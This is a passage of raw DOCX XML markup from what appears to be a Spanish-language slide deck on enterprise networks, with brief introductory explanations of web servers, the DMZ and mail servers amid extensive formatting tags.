        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A895D2D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62C87A5C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="400B14A8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="042446D4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EBDE5AA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5620A2DE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D14FF15" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="698A99B3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05375667" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36FA4FE3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BD78039" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="555ECC7E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30D7EA0C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="663A93E4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7048813E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28932B8D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30FA75CC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1385E815" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1325205C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12571BC7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32D1572B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2409D71A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="288DC90D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6266D1EF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D90B257" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53167864" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="63"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2015646E"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41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBA8A1A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId49"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="320" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="625105D9"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46560" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0EA53A97" wp14:editId="73C55AF0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="11938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107" name="Graphic 107"/>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108" name="Textbox 108"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1193800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="14CD83AC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="391"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>RED EMPRESARIAL</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="0EA53A97" id="Group 106" o:spid="_x0000_s1084" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:94pt;z-index:15746560;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">
                <v:shape id="Graphic 107" o:spid="_x0000_s1085"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" path="m12192000,l,,,1193291r12192000,l12192000,xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 108" o:spid="_x0000_s1086"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4CD83AC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="391"/>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>RED EMPRESARIAL</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="595A4027" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="765C0EB4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="33"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44ACF6DE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1089"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="681"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>La red empresarial consta de varios servidores asignados a roles, que se detallan a continuación: -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8776A5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="176"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79DF632B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo7"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1808"/>
        </w:tabs>
        <w:ind w:left="1808" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Servidor web </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EC508D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2529"/>
          <w:tab w:val="left" w:pos="2617"/>
        </w:tabs>
        <w:spacing w:before="90" w:line="211" w:lineRule="auto"/>
        <w:ind w:right="642" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:tab/>
        <w:t>Es un software que entiende las URL (direcciones web) y HTTP (el protocolo que utiliza su navegador para ver páginas web). Se puede acceder a un servidor HTTP a través de los nombres de dominio de los sitios web que almacena, y entrega el contenido de estos sitios web alojados al dispositivo del usuario final.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DAE24D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="150"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D287CD6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2529"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="211" w:lineRule="auto"/>
        <w:ind w:right="573" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>También puede ser a través de un ordenador donde se almacena el contenido web. Básicamente, el servidor web se utiliza para alojar los sitios web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454A07EA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="375"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="441E84AF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2528"/>
        </w:tabs>
        <w:ind w:left="2528" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Los servidores web externos se colocan en la red DMZ, que atiende las solicitudes de los clientes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D4FDE5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="87"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="431D2F9B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2528"/>
        </w:tabs>
        <w:ind w:left="2528" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Por lo general, están conectados al entorno interno (red empresarial).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B818FC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId50"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:pgNumType w:start="42"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EA366EC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo7"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1474"/>
        </w:tabs>
        <w:spacing w:before="51"/>
        <w:ind w:left="1474" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Servidor de correo </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB02A5F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="121"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A567904" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2195"/>
          <w:tab w:val="left" w:pos="2284"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="211" w:lineRule="auto"/>
        <w:ind w:left="2195" w:right="996" w:hanging="361"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:tab/>
        <w:t>Un servidor de correo (o servidor de correo electrónico) es un servidor que maneja y entrega correo electrónico a través de una red, generalmente a través de Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126D8E0F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FEF95BE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="192"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="755047A7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2193"/>
          <w:tab w:val="left" w:pos="2195"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="2195" w:right="465" w:hanging="361"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Un servidor de correo puede recibir correos electrónicos de equipos cliente y entregarlos a otros servidores de correo. Un servidor de correo también puede entregar correos electrónicos a los equipos cliente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D9C343" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
